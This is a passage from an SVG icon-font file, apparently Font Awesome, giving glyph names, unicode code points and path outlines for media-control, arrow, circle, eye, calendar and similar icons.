l-171.5 155.3v-130.7c0 -27.4004 -31.9004 -41.7002 -52.5 -24.5996l-171.5 155.3v-150.7c0 -6.59961 -5.40039 -12 -12 -12h-40c-6.59961 0 -12 5.40039 -12 12z" />
    <glyph glyph-name="backward" unicode="&#xf04a;" 
d="M11.5 167.4c-15.2998 12.7998 -15.2998 36.3994 0 49.1992l192 160c20.5996 17.2002 52.5 2.80078 52.5 -24.5996v-320c0 -27.4004 -31.9004 -41.7998 -52.5 -24.5996zM267.5 167.4c-15.2998 12.7998 -15.2998 36.3994 0 49.1992l192 160
c20.5996 17.2002 52.5 2.80078 52.5 -24.5996v-320c0 -27.4004 -31.9004 -41.7998 -52.5 -24.5996z" />
    <glyph glyph-name="play" unicode="&#xf04b;" horiz-adv-x="447" 
d="M424.4 233.3c31.5 -18.5 31.3994 -64.0996 0 -82.5996l-352 -208c-31.7002 -18.7998 -72.4004 3.7998 -72.4004 41.2998v416.1c0 41.8008 43.7998 58.2002 72.4004 41.3008z" />
    <glyph glyph-name="pause" unicode="&#xf04c;" horiz-adv-x="448" 
d="M144 -31h-96c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h96c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48zM448 17c0 -26.5 -21.5 -48 -48 -48h-96c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h96c26.5 0 48 -21.5 48 -48v-352z" />
    <glyph glyph-name="stop" unicode="&#xf04d;" horiz-adv-x="448" 
d="M400 416c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h352z" />
    <glyph glyph-name="forward" unicode="&#xf04e;" horiz-adv-x="511" 
d="M500.5 216.6c15.2998 -12.7998 15.2998 -36.3994 0 -49.1992l-192 -160c-20.5996 -17.2002 -52.5 -2.80078 -52.5 24.5996v320c0 27.4004 31.9004 41.7002 52.5 24.5996zM244.5 216.6c15.2998 -12.7998 15.2998 -36.3994 0 -49.1992l-192 -160
c-20.5996 -17.2002 -52.5 -2.80078 -52.5 24.5996v320c0 27.4004 31.9004 41.7002 52.5 24.5996z" />
    <glyph glyph-name="fast-forward" unicode="&#xf050;" 
d="M512 372v-360c0 -6.59961 -5.40039 -12 -12 -12h-40c-6.59961 0 -12 5.40039 -12 12v151.9l-171.5 -156.5c-20.5996 -17.2002 -52.5 -2.80078 -52.5 24.5996v131.9l-171.5 -156.5c-20.5996 -17.2002 -52.5 -2.80078 -52.5 24.5996v320
c0 27.4004 31.9004 41.7002 52.5 24.5996l171.5 -155.399v130.8c0 27.4004 31.9004 41.7002 52.5 24.5996l171.5 -155.399v150.8c0 6.59961 5.40039 12 12 12h40c6.59961 0 12 -5.40039 12 -12z" />
    <glyph glyph-name="step-forward" unicode="&#xf051;" horiz-adv-x="448" 
d="M384 404v-424c0 -6.59961 -5.40039 -12 -12 -12h-48c-6.59961 0 -12 5.40039 -12 12v176.4l-195.5 -181c-20.5996 -17.1006 -52.5 -2.80078 -52.5 24.5996v384c0 27.4004 31.9004 41.7002 52.5 24.5996l195.5 -179.899v175.3c0 6.59961 5.40039 12 12 12h48
c6.59961 0 12 -5.40039 12 -12z" />
    <glyph glyph-name="eject" unicode="&#xf052;" horiz-adv-x="448" 
d="M448 64v-64c0 -17.6729 -14.3271 -32 -32 -32h-384c-17.6729 0 -32 14.3271 -32 32v64c0 17.6729 14.3271 32 32 32h384c17.6729 0 32 -14.3271 32 -32zM48.0527 128c-41.7285 0 -63.5273 49.7324 -35.3828 80.4346l175.946 192.008
c19.0156 20.7432 51.7529 20.7422 70.7666 0l175.939 -192.008c28.1973 -30.7607 6.26758 -80.4346 -35.3828 -80.4346h-351.887z" />
    <glyph glyph-name="chevron-left" unicode="&#xf053;" horiz-adv-x="320" 
d="M34.5195 208.97l194.351 194.34c9.37012 9.37012 24.5703 9.37012 33.9395 0l22.6709 -22.6699c9.35938 -9.35938 9.36914 -24.5195 0.0390625 -33.8994l-154.029 -154.74l154.02 -154.75c9.33984 -9.37988 9.32031 -24.54 -0.0400391 -33.9004l-22.6699 -22.6699
c-9.37012 -9.37012 -24.5693 -9.37012 -33.9395 0l-194.341 194.351c-9.36914 9.37012 -9.36914 24.5693 0 33.9395z" />
    <glyph glyph-name="chevron-right" unicode="&#xf054;" horiz-adv-x="319" 
d="M285.476 175.029l-194.344 -194.344c-9.37305 -9.37207 -24.5684 -9.37207 -33.9404 0l-22.667 22.667c-9.35742 9.35742 -9.375 24.5225 -0.0400391 33.9014l154.021 154.746l-154.021 154.745c-9.33496 9.37891 -9.31738 24.5439 0.0400391 33.9014l22.667 22.667
c9.37305 9.37207 24.5684 9.37207 33.9404 0l194.343 -194.344c9.37305 -9.37207 9.37305 -24.5674 0.000976562 -33.9404z" />
    <glyph glyph-name="plus-circle" unicode="&#xf055;" 
d="M256 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM400 164v56c0 6.59961 -5.40039 12 -12 12h-92v92c0 6.59961 -5.40039 12 -12 12h-56c-6.59961 0 -12 -5.40039 -12 -12v-92h-92c-6.59961 0 -12 -5.40039 -12 -12v-56
c0 -6.59961 5.40039 -12 12 -12h92v-92c0 -6.59961 5.40039 -12 12 -12h56c6.59961 0 12 5.40039 12 12v92h92c6.59961 0 12 5.40039 12 12z" />
    <glyph glyph-name="minus-circle" unicode="&#xf056;" 
d="M256 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM124 152h264c6.59961 0 12 5.40039 12 12v56c0 6.59961 -5.40039 12 -12 12h-264c-6.59961 0 -12 -5.40039 -12 -12v-56c0 -6.59961 5.40039 -12 12 -12z" />
    <glyph glyph-name="times-circle" unicode="&#xf057;" 
d="M256 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM377.6 126.9l-65.5996 65.0996l65.7002 65c4.7002 4.7002 4.7002 12.2998 0 17l-39.6006 39.5996c-4.69922 4.7002 -12.2998 4.7002 -17 0l-65.0996 -65.5996l-65 65.7002
c-4.7002 4.7002 -12.2998 4.7002 -17 0l-39.5996 -39.6006c-4.7002 -4.69922 -4.7002 -12.2998 0 -17l65.5996 -65.0996l-65.5996 -65c-4.7002 -4.7002 -4.7002 -12.2998 0 -17l39.5 -39.5996c4.69922 -4.7002 12.2998 -4.7002 17 0l65.0996 65.5996l65 -65.5996
c4.7002 -4.7002 12.2998 -4.7002 17 0l39.5996 39.5c4.7002 4.69922 4.7002 12.2998 0 17z" />
    <glyph glyph-name="check-circle" unicode="&#xf058;" 
d="M504 192c0 -136.967 -111.033 -248 -248 -248s-248 111.033 -248 248s111.033 248 248 248s248 -111.033 248 -248zM227.314 60.6855l184 184c6.24707 6.24805 6.24707 16.3799 0 22.6279l-22.6279 22.627c-6.24707 6.24902 -16.3789 6.24902 -22.6279 0
l-150.059 -150.059l-70.0586 70.0596c-6.24805 6.24805 -16.3799 6.24805 -22.6279 0l-22.6279 -22.627c-6.24707 -6.24805 -6.24707 -16.3799 0 -22.6279l104 -104c6.24902 -6.24805 16.3799 -6.24805 22.6289 -0.000976562z" />
    <glyph glyph-name="question-circle" unicode="&#xf059;" 
d="M504 192c0 -136.997 -111.043 -248 -248 -248s-248 111.003 -248 248c0 136.917 111.043 248 248 248s248 -111.083 248 -248zM262.655 358c-54.4971 0 -89.2549 -22.957 -116.549 -63.7578c-3.53613 -5.28613 -2.35352 -12.415 2.71484 -16.2578l34.6982 -26.3105
c5.20508 -3.94727 12.6211 -3.00781 16.665 2.12207c17.8643 22.6582 30.1133 35.7969 57.3037 35.7969c20.4287 0 45.6973 -13.1475 45.6973 -32.958c0 -14.9756 -12.3623 -22.667 -32.5332 -33.9756c-23.5244 -13.1875 -54.6523 -29.6006 -54.6523 -70.6592v-4
c0 -6.62695 5.37305 -12 12 -12h56c6.62695 0 12 5.37305 12 12v1.33301c0 28.4619 83.1855 29.6475 83.1855 106.667c0 58.002 -60.1641 102 -116.53 102zM256 110c-25.3652 0 -46 -20.6348 -46 -46c0 -25.3643 20.6348 -46 46 -46s46 20.6357 46 46
c0 25.3652 -20.6348 46 -46 46z" />
    <glyph glyph-name="info-circle" unicode="&#xf05a;" 
d="M256 440c136.957 0 248 -111.083 248 -248c0 -136.997 -111.043 -248 -248 -248s-248 111.003 -248 248c0 136.917 111.043 248 248 248zM256 330c-23.1963 0 -42 -18.8037 -42 -42s18.8037 -42 42 -42s42 18.8037 42 42s-18.8037 42 -42 42zM312 76v24
c0 6.62695 -5.37305 12 -12 12h-12v100c0 6.62695 -5.37305 12 -12 12h-64c-6.62695 0 -12 -5.37305 -12 -12v-24c0 -6.62695 5.37305 -12 12 -12h12v-64h-12c-6.62695 0 -12 -5.37305 -12 -12v-24c0 -6.62695 5.37305 -12 12 -12h88c6.62695 0 12 5.37305 12 12z" />
    <glyph glyph-name="crosshairs" unicode="&#xf05b;" 
d="M500 224c6.62695 0 12 -5.37305 12 -12v-40c0 -6.62695 -5.37305 -12 -12 -12h-30.3643c-13.9121 -93.6748 -87.9609 -167.724 -181.636 -181.636v-30.3643c0 -6.62695 -5.37305 -12 -12 -12h-40c-6.62695 0 -12 5.37305 -12 12v30.3643
c-93.6748 13.9121 -167.724 87.9609 -181.636 181.636h-30.3643c-6.62695 0 -12 5.37305 -12 12v40c0 6.62695 5.37305 12 12 12h30.3643c13.9121 93.6748 87.9609 167.724 181.636 181.636v30.3643c0 6.62695 5.37305 12 12 12h40c6.62695 0 12 -5.37305 12 -12v-30.3643
c93.6748 -13.9121 167.724 -87.9609 181.636 -181.636h30.3643zM288 43.3662c58.2432 12.417 104.232 58.46 116.634 116.634h-40.6338c-6.62695 0 -12 5.37305 -12 12v40c0 6.62695 5.37305 12 12 12h40.6338c-12.417 58.2432 -58.46 104.232 -116.634 116.634v-40.6338
c0 -6.62695 -5.37305 -12 -12 -12h-40c-6.62695 0 -12 5.37305 -12 12v40.6338c-58.2432 -12.417 -104.232 -58.46 -116.634 -116.634h40.6338c6.62695 0 12 -5.37305 12 -12v-40c0 -6.62695 -5.37305 -12 -12 -12h-40.6338
c12.417 -58.2432 58.46 -104.232 116.634 -116.634v40.6338c0 6.62695 5.37305 12 12 12h40c6.62695 0 12 -5.37305 12 -12v-40.6338zM288 192c0 -17.6729 -14.3271 -32 -32 -32s-32 14.3271 -32 32s14.3271 32 32 32s32 -14.3271 32 -32z" />
    <glyph glyph-name="ban" unicode="&#xf05e;" 
d="M256 440c136.967 0 248 -111.034 248 -248s-111.034 -248 -248 -248s-248 111.033 -248 248s111.034 248 248 248zM386.108 322.108c-65.4121 65.4102 -165.435 70.0312 -235.639 20.6758l256.315 -256.313c49.3232 70.1562 44.7705 170.189 -20.6768 235.638z
M125.892 61.8916c65.4121 -65.4111 165.436 -70.0312 235.639 -20.6758l-256.315 256.313c-49.3232 -70.1562 -44.7705 -170.189 20.6768 -235.638z" />
    <glyph glyph-name="arrow-left" unicode="&#xf060;" horiz-adv-x="448" 
d="M257.5 2.90039l-22.2002 -22.2002c-9.39941 -9.40039 -24.5996 -9.40039 -33.8994 0l-194.4 194.3c-9.40039 9.40039 -9.40039 24.5996 0 33.9004l194.4 194.399c9.39941 9.40039 24.5996 9.40039 33.8994 0l22.2002 -22.2002c9.5 -9.5 9.2998 -25 -0.400391 -34.2998
l-120.5 -114.8h287.4c13.2998 0 24 -10.7002 24 -24v-32c0 -13.2998 -10.7002 -24 -24 -24h-287.4l120.5 -114.8c9.80078 -9.2998 10 -24.7998 0.400391 -34.2998z" />
    <glyph glyph-name="arrow-right" unicode="&#xf061;" horiz-adv-x="448" 
d="M190.5 381.1l22.2002 22.2002c9.39941 9.40039 24.5996 9.40039 33.8994 0l194.4 -194.3c9.40039 -9.40039 9.40039 -24.5996 0 -33.9004l-194.4 -194.399c-9.39941 -9.40039 -24.5996 -9.40039 -33.8994 0l-22.2002 22.2002c-9.5 9.5 -9.2998 25 0.400391 34.2998
l120.5 114.8h-287.4c-13.2998 0 -24 10.7002 -24 24v32c0 13.2998 10.7002 24 24 24h287.4l-120.5 114.8c-9.80078 9.2998 -10 24.7998 -0.400391 34.2998z" />
    <glyph glyph-name="arrow-up" unicode="&#xf062;" horiz-adv-x="447" 
d="M34.9004 158.5l-22.2002 22.2002c-9.40039 9.39941 -9.40039 24.5996 0 33.8994l194.3 194.4c9.40039 9.40039 24.5996 9.40039 33.9004 0l194.3 -194.3c9.39941 -9.40039 9.39941 -24.6006 0 -33.9004l-22.2002 -22.2002c-9.5 -9.5 -25 -9.2998 -34.2998 0.400391
l-114.7 120.4v-287.4c0 -13.2998 -10.7002 -24 -24 -24h-32c-13.2998 0 -24 10.7002 -24 24v287.4l-114.8 -120.5c-9.2998 -9.80078 -24.7998 -10 -34.2998 -0.400391z" />
    <glyph glyph-name="arrow-down" unicode="&#xf063;" horiz-adv-x="448" 
d="M413.1 225.5l22.2002 -22.2002c9.40039 -9.39941 9.40039 -24.5996 0 -33.8994l-194.3 -194.4c-9.40039 -9.40039 -24.5996 -9.40039 -33.9004 0l-194.399 194.4c-9.40039 9.39941 -9.40039 24.5996 0 33.8994l22.2002 22.2002c9.5 9.5 25 9.2998 34.2998 -0.400391
l114.8 -120.5v287.4c0 13.2998 10.7002 24 24 24h32c13.2998 0 24 -10.7002 24 -24v-287.4l114.8 120.5c9.2998 9.80078 24.7998 10 34.2998 0.400391z" />
    <glyph glyph-name="share" unicode="&#xf064;" 
d="M503.691 258.164c11.0859 -9.5752 11.0703 -26.7656 0 -36.3281l-176.005 -152c-15.3867 -13.2891 -39.6865 -2.53613 -39.6865 18.1641v87.915c-155.083 -2.23145 -221.934 -40.7295 -176.59 -185.742c5.03418 -16.0977 -14.4238 -28.5615 -28.0771 -18.6309
c-43.752 31.8232 -83.333 92.6914 -83.333 154.132c0 152.227 127.371 184.419 288 186.258v80.0537c0 20.668 24.2812 31.4688 39.6865 18.1641z" />
    <glyph glyph-name="expand" unicode="&#xf065;" horiz-adv-x="448" 
d="M0 268v124c0 13.2998 10.7002 24 24 24h124c6.59961 0 12 -5.40039 12 -12v-40c0 -6.59961 -5.40039 -12 -12 -12h-84v-84c0 -6.59961 -5.40039 -12 -12 -12h-40c-6.59961 0 -12 5.40039 -12 12zM288 404c0 6.59961 5.40039 12 12 12h124c13.2998 0 24 -10.7002 24 -24
v-124c0 -6.59961 -5.40039 -12 -12 -12h-40c-6.59961 0 -12 5.40039 -12 12v84h-84c-6.59961 0 -12 5.40039 -12 12v40zM436 128c6.59961 0 12 -5.40039 12 -12v-124c0 -13.2998 -10.7002 -24 -24 -24h-124c-6.59961 0 -12 5.40039 -12 12v40c0 6.59961 5.40039 12 12 12h84
v84c0 6.59961 5.40039 12 12 12h40zM160 -20c0 -6.59961 -5.40039 -12 -12 -12h-124c-13.2998 0 -24 10.7002 -24 24v124c0 6.59961 5.40039 12 12 12h40c6.59961 0 12 -5.40039 12 -12v-84h84c6.59961 0 12 -5.40039 12 -12v-40z" />
    <glyph glyph-name="compress" unicode="&#xf066;" horiz-adv-x="448" 
d="M436 256h-124c-13.2998 0 -24 10.7002 -24 24v124c0 6.59961 5.40039 12 12 12h40c6.59961 0 12 -5.40039 12 -12v-84h84c6.59961 0 12 -5.40039 12 -12v-40c0 -6.59961 -5.40039 -12 -12 -12zM160 280c0 -13.2998 -10.7002 -24 -24 -24h-124
c-6.59961 0 -12 5.40039 -12 12v40c0 6.59961 5.40039 12 12 12h84v84c0 6.59961 5.40039 12 12 12h40c6.59961 0 12 -5.40039 12 -12v-124zM160 -20c0 -6.59961 -5.40039 -12 -12 -12h-40c-6.59961 0 -12 5.40039 -12 12v84h-84c-6.59961 0 -12 5.40039 -12 12v40
c0 6.59961 5.40039 12 12 12h124c13.2998 0 24 -10.7002 24 -24v-124zM352 -20c0 -6.59961 -5.40039 -12 -12 -12h-40c-6.59961 0 -12 5.40039 -12 12v124c0 13.2998 10.7002 24 24 24h124c6.59961 0 12 -5.40039 12 -12v-40c0 -6.59961 -5.40039 -12 -12 -12h-84v-84z" />
    <glyph glyph-name="plus" unicode="&#xf067;" horiz-adv-x="448" 
d="M416 240c17.6699 0 32 -14.3301 32 -32v-32c0 -17.6699 -14.3301 -32 -32 -32h-144v-144c0 -17.6699 -14.3301 -32 -32 -32h-32c-17.6699 0 -32 14.3301 -32 32v144h-144c-17.6699 0 -32 14.3301 -32 32v32c0 17.6699 14.3301 32 32 32h144v144
c0 17.6699 14.3301 32 32 32h32c17.6699 0 32 -14.3301 32 -32v-144h144z" />
    <glyph glyph-name="minus" unicode="&#xf068;" horiz-adv-x="448" 
d="M416 240c17.6699 0 32 -14.3301 32 -32v-32c0 -17.6699 -14.3301 -32 -32 -32h-384c-17.6699 0 -32 14.3301 -32 32v32c0 17.6699 14.3301 32 32 32h384z" />
    <glyph glyph-name="asterisk" unicode="&#xf069;" 
d="M478.21 113.907c11.7949 -6.47754 15.96 -21.3828 9.23242 -33.0361l-19.4805 -33.7412c-6.72754 -11.6533 -21.7207 -15.499 -33.2266 -8.52246l-138.735 84.1104l3.47559 -162.204c0.288086 -13.4531 -10.5391 -24.5137 -23.9941 -24.5137h-38.9619
c-13.4551 0 -24.2822 11.0605 -23.9941 24.5137l3.47461 162.204l-138.735 -84.1113c-11.5059 -6.97656 -26.499 -3.13086 -33.2266 8.52246l-19.4805 33.7412c-6.72852 11.6533 -2.5625 26.5596 9.23242 33.0371l142.21 78.0928l-142.209 78.0918
c-11.7949 6.47754 -15.9609 21.3838 -9.2334 33.0371l19.4805 33.7412c6.72754 11.6533 21.7207 15.499 33.2266 8.52246l138.735 -84.1104l-3.47363 162.204c-0.289062 13.4531 10.5381 24.5137 23.9932 24.5137h38.9609c13.4561 0 24.2822 -11.0605 23.9941 -24.5137
l-3.47461 -162.204l138.735 84.1113c11.5068 6.97656 26.499 3.13086 33.2266 -8.52246l19.4805 -33.7412c6.72852 -11.6533 2.5625 -26.5596 -9.23242 -33.0371l-142.21 -78.0928z" />
    <glyph glyph-name="exclamation-circle" unicode="&#xf06a;" 
d="M504 192c0 -136.997 -111.043 -248 -248 -248s-248 111.003 -248 248c0 136.917 111.043 248 248 248s248 -111.083 248 -248zM256 142c-25.4053 0 -46 -20.5947 -46 -46s20.5947 -46 46 -46s46 20.5947 46 46s-20.5947 46 -46 46zM212.327 307.346l7.41797 -136
c0.34668 -6.36328 5.6084 -11.3457 11.9814 -11.3457h48.5469c6.37305 0 11.6348 4.98242 11.9814 11.3457l7.41797 136c0.375 6.87402 -5.09766 12.6543 -11.9814 12.6543h-63.3838c-6.88379 0 -12.3555 -5.78027 -11.9805 -12.6543z" />
    <glyph glyph-name="gift" unicode="&#xf06b;" 
d="M32 0v128h192v-160h-160c-17.7002 0 -32 14.2998 -32 32zM288 -32v160h192v-128c0 -17.7002 -14.2998 -32 -32 -32h-160zM480 288c17.7002 0 32 -14.2998 32 -32v-80c0 -8.7998 -7.2002 -16 -16 -16h-480c-8.7998 0 -16 7.2002 -16 16v80c0 17.7002 14.2998 32 32 32
h44.0996c-6.2998 12.0996 -10.0996 25.5 -10.0996 40c0 48.5 39.5 88 88 88c41.5996 0 68.5 -21.2998 103 -68.2998c34.5 47 61.4004 68.2998 103 68.2998c48.5 0 88 -39.5 88 -88c0 -14.5 -3.90039 -27.9004 -10.0996 -40h42.0996zM153.9 288h86.0996
c-51.5 76.7002 -66.2002 80 -86.0996 80c-22.1006 0 -40 -17.9004 -40 -40s17.8994 -40 40 -40zM360 288c22.0996 0 40 17.9004 40 40s-17.9004 40 -40 40c-20.4004 0 -34.7002 -3.5 -86.0996 -80h86.0996z" />
    <glyph glyph-name="leaf" unicode="&#xf06c;" horiz-adv-x="576" 
d="M546.2 438.3c19 -42.3994 29.7998 -94.3994 29.7998 -144.6c0 -172.4 -110.5 -313.2 -267.5 -324.601c-80.9004 -8.59961 -142.5 33.3008 -174.9 77.2002c-51 -42.7002 -70.3994 -87 -71.8994 -90.5996c-6.7998 -16.2002 -25.4004 -24.1006 -41.7998 -17.2998
c-16.3008 6.69922 -24.1006 25.2998 -17.5 41.5996c23.5996 57.9004 130.199 212 381.6 212c8.7998 0 16 7.2002 16 16s-7.2002 16 -16 16c-130.6 0 -222.7 -38.7998 -286.5 -84.5c-0.700195 6.7998 -1.5 13.5 -1.5 20.5c0 106 86 192 192 192h80
c63.4004 0 118.9 33.5996 149.9 87.5c6.69922 11.7998 22.6992 11.2998 28.2998 -1.2002z" />
    <glyph glyph-name="fire" unicode="&#xf06d;" horiz-adv-x="384" 
d="M216 424.14c0 -103.14 168 -125.85 168 -296.14c0 -105.87 -86.1299 -192 -192 -192s-192 86.1299 -192 192c0 58.6699 27.7998 106.84 54.5703 134.96c14.96 15.7305 41.4297 5.2002 41.4297 -16.5v-85.5098c0 -35.1699 27.9805 -64.4902 63.1504 -64.9404
c35.7393 -0.469727 64.8496 28.3604 64.8496 63.9902c0 88 -176 96.1504 -52.1504 277.18c13.5 19.7305 44.1504 10.7607 44.1504 -13.04z" />
    <glyph glyph-name="eye" unicode="&#xf06e;" horiz-adv-x="576" 
d="M572.52 206.6c1.9209 -3.79883 3.47949 -10.3379 3.47949 -14.5947s-1.55859 -10.7959 -3.47949 -14.5947c-54.1992 -105.771 -161.59 -177.41 -284.52 -177.41s-230.29 71.5898 -284.52 177.4c-1.9209 3.79883 -3.47949 10.3379 -3.47949 14.5947
s1.55859 10.7959 3.47949 14.5947c54.1992 105.771 161.59 177.41 284.52 177.41s230.29 -71.5898 284.52 -177.4zM288 48h0.0703125c79.4492 0 143.93 64.4805 143.93 143.93v0.0703125c0 79.4883 -64.5117 144 -144 144s-144 -64.5117 -144 -144s64.5117 -144 144 -144z
M288 288h0.225586c52.8701 0 95.7803 -42.9092 95.7803 -95.7793c0 -52.8711 -42.9102 -95.7803 -95.7803 -95.7803c-52.8711 0 -95.7803 42.9092 -95.7803 95.7803c0 7.04785 1.49805 18.2871 3.34473 25.0889c6.9834 -5.13867 19.6895 -9.30957 28.3604 -9.30957
c26.4131 0 47.8496 21.4365 47.8496 47.8496c0 8.6709 -4.1709 21.377 -9.30957 28.3604c6.84375 1.99219 18.1826 3.69043 25.3096 3.79004z" />
    <glyph glyph-name="eye-slash" unicode="&#xf070;" horiz-adv-x="640" 
d="M320 48c7.24121 0.0673828 18.8896 1.23633 26 2.61035l51.8896 -40.1504c-25.0195 -6.45996 -50.9795 -10.46 -77.8896 -10.46c-122.93 0 -230.29 71.5898 -284.52 177.4c-1.9209 3.79883 -3.47949 10.3379 -3.47949 14.5947s1.55859 10.7959 3.47949 14.5947
c10.2393 20 22.9297 38.29 36.7197 55.5898l104.899 -81.0693c5.65039 -74.4004 67.0508 -133.11 142.9 -133.11zM633.82 -10.0996c3.41309 -2.65234 6.18359 -8.3125 6.18359 -12.6357c0 -3.02734 -1.50684 -7.42383 -3.36426 -9.81445l-19.6396 -25.2705
c-2.65234 -3.41211 -8.31152 -6.18262 -12.6338 -6.18262c-3.03125 0 -7.43359 1.51172 -9.82617 3.37305l-588.36 454.729c-3.41016 2.65234 -6.17773 8.31055 -6.17773 12.6309c0 3.0293 1.50879 7.42773 3.36816 9.81934l19.6299 25.2705
c2.65234 3.41211 8.31152 6.18262 12.6338 6.18262c3.03125 0 7.43359 -1.51172 9.82617 -3.37305l127.22 -98.3301c38.0117 20.7578 104.011 37.6475 147.32 37.7002c122.93 0 230.29 -71.5898 284.52 -177.4c1.9209 -3.79883 3.47949 -10.3379 3.47949 -14.5947
s-1.55859 -10.7959 -3.47949 -14.5947c-16.7666 -32.6758 -53.166 -78.4033 -81.25 -102.07zM450.1 131.9c8.61035 18.3203 13.9004 38.4697 13.9004 60.0996v0.0800781c0 79.4434 -64.4766 143.92 -143.92 143.92h-0.0800781
c-28.4697 -0.0214844 -69.3047 -14.8545 -91.1504 -33.1104l73.6104 -56.8896c0.726562 2.71387 1.41602 7.19336 1.54004 10c-0.015625 8.62891 -4.18652 21.2666 -9.30957 28.21c7.17969 2.09668 19.0781 3.79785 26.5576 3.79785
c52.3076 0 94.7598 -42.4521 94.7598 -94.7598c0 -0.344727 -0.00292969 -0.90332 -0.0078125 -1.24805c-0.112305 -8.43457 -2.44238 -21.749 -5.2002 -29.7197z" />
    <glyph glyph-name="exclamation-triangle" unicode="&#xf071;" horiz-adv-x="576" 
d="M569.517 7.9873c18.458 -31.9941 -4.71094 -71.9873 -41.5762 -71.9873h-479.887c-36.9365 0 -59.999 40.0547 -41.5771 71.9873l239.946 416.027c18.4668 32.0098 64.7197 31.9512 83.1543 0zM288 94c-25.4053 0 -46 -20.5947 -46 -46s20.5947 -46 46 -46
s46 20.5947 46 46s-20.5947 46 -46 46zM244.327 259.346l7.41797 -136c0.34668 -6.36328 5.6084 -11.3457 11.9814 -11.3457h48.5469c6.37305 0 11.6348 4.98242 11.9814 11.3457l7.41797 136c0.375 6.87402 -5.09766 12.6543 -11.9814 12.6543h-63.3838
c-6.88379 0 -12.3555 -5.78027 -11.9805 -12.6543z" />
    <glyph glyph-name="plane" unicode="&#xf072;" horiz-adv-x="576" 
d="M480 256c35.3496 0 96 -28.6504 96 -64s-60.6504 -64 -96 -64h-114.29l-105.11 -183.94c-2.84961 -4.97949 -8.14941 -8.05957 -13.8896 -8.05957h-65.5c-10.6299 0 -18.2998 10.1797 -15.3799 20.4004l49.0303 171.6h-102.86l-43.2002 -57.5996
c-3.01953 -4.03027 -7.75977 -6.40039 -12.7998 -6.40039h-39.9902c-10.4102 0 -18.0498 9.78027 -15.5195 19.8799l31.5098 108.12l-31.5098 108.12c-2.53027 10.0996 5.10938 19.8799 15.5195 19.8799h39.9902c5.03027 0 9.78027 -2.37012 12.7998 -6.40039
l43.2002 -57.5996h102.86l-49.0303 171.61c-2.91992 10.2197 4.75 20.3896 15.3799 20.3896h65.5h0.000976562c5.12598 0 11.3525 -3.61133 13.8994 -8.05957l105.1 -183.94h114.29z" />
    <glyph glyph-name="calendar-alt" unicode="&#xf073;" horiz-adv-x="448" 
d="M0 -16v272h448v-272c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48zM320 180v-40c0 -6.59961 5.40039 -12 12 -12h40c6.59961 0 12 5.40039 12 12v40c0 6.59961 -5.40039 12 -12 12h-40c-6.59961 0 -12 -5.40039 -12 -12zM320 52v-40
c0 -6.59961 5.40039 -12 12 -12h40c6.59961 0 12 5.40039 12 12v40c0 6.59961 -5.40039 12 -12 12h-40c-6.59961 0 -12 -5.40039 -12 -12zM192 180v-40c0 -6.59961 5.40039 -12 12 -12h40c6.59961 0 12 5.40039 12 12v40c0 6.59961 -5.40039 12 -12 12h-40
c-6.59961 0 -12 -5.40039 -12 -12zM192 52v-40c0 -6.59961 5.40039 -12 12 -12h40c6.59961 0 12 5.40039 12 12v40c0 6.59961 -5.40039 12 -12 12h-40c-6.59961 0 -12 -5.40039 -12 -12zM64 180v-40c0 -6.59961 5.40039 -12 12 -12h40c6.59961 0 12 5.40039 12 12v40
c0 6.59961 -5.40039 12 -12 12h-40c-6.59961 0 -12 -5.40039 -12 -12zM64 52v-40c0 -6.59961 5.40039 -12 12 -12h40c6.59961 0 12 5.40039 12 12v40c0 6.59961 -5.40039 12 -12 12h-40c-6.59961 0 -12 -5.40039 -12 -12zM400 384c26.5 0 48 -21.5 48 -48v-48h-448v48
c0 26.5 21.5 48 48 48h48v48c0 8.7998 7.2002 16 16 16h32c8.7998 0 16 -7.2002 16 -16v-48h128v48c0 8.7998 7.2002 16 16 16h32c8.7998 0 16 -7.2002 16 -16v-48h48z" />
    <glyph glyph-name="random" unicode="&#xf074;" 
d="M504.971 88.9707c9.37305 -9.37305 9.37305 -24.5684 0 -33.9404l-80 -79.9844c-15.0098 -15.0098 -40.9707 -4.49023 -40.9707 16.9707v39.9834h-58.7852c-2.87793 0 -6.80859 1.70801 -8.77246 3.81152l-70.5566 75.5967l53.333 57.1426l52.7812 -56.5508h32v39.9814
c0 21.4375 25.9434 31.9971 40.9707 16.9707zM12 272c-6.62695 0 -12 5.37305 -12 12v56c0 6.62695 5.37305 12 12 12h110.785h0.000976562c2.87793 0 6.80762 -1.70801 8.77148 -3.81152l70.5566 -75.5967l-53.333 -57.1426l-52.7812 56.5508h-84zM384 272h-32
l-220.442 -236.188c-2.26953 -2.43066 -5.44629 -3.81152 -8.77246 -3.81152h-110.785c-6.62695 0 -12 5.37305 -12 12v56c0 6.62695 5.37305 12 12 12h84l220.442 236.188c1.96387 2.10352 5.89453 3.81152 8.77246 3.81152h58.7852v39.9814
c0 21.4365 25.9434 31.9971 40.9707 16.9697l80 -79.9814c9.37305 -9.37207 9.37305 -24.5674 0 -33.9404l-80 -79.9844c-15.0098 -15.0088 -40.9707 -4.48926 -40.9707 16.9707v39.9844z" />
    <glyph glyph-name="comment" unicode="&#xf075;" 
d="M256 416c141.4 0 256 -93.0996 256 -208s-114.6 -208 -256 -208c-38.4004 0 -74.7002 7.09961 -107.4 19.4004c-24.5996 -19.6006 -74.2998 -51.4004 -140.6 -51.4004c-3.2002 0 -6 1.7998 -7.2998 4.7998s-0.700195 6.40039 1.5 8.7002
c0.5 0.5 42.2998 45.4004 54.7998 95.7998c-35.5996 35.7002 -57 81.1006 -57 130.7c0 114.9 114.6 208 256 208z" />
    <glyph glyph-name="magnet" unicode="&#xf076;" 
